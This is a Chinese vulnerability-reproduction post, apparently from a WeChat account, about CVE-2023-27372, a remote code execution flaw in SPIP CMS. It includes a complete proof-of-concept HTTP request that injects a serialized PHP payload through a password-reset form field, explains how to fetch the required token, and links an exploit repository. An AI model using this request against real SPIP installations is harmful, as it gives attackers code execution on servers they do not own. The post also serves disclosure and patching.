0x00 团队声明
该漏洞为我团队漏洞监测平台发现,仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x01 漏洞概述
漏洞编号:CVE-2023-27372
SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当。
0x02 影响版本
POC
POST /spip/spip.php?page=spip_pass HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cibcInit=oui
Content-Length: 215
Content-Type: application/x-www-form-urlencoded
page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=
这里formulaire_action_args参数需访问路径:/spip.php?page=spip_pass获取,标签为:input,name为:formulaire_action_args
page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=
通过上面的代码我们可以清楚的看到我们执行了 phpinfo()函数,执行结果如下。表示我们成功复现了该漏洞。
EXP
https://github.com/Pari-Malam/CVE-2023-27372
0x04 整改意见
①建议及时更新至最新版本。
0x05 关注我们
0x06 推荐书籍
扫码购书
原文始发于微信公众号(小白嘿课):CVE-2023-27372 SPIP CMS远程代码执行漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论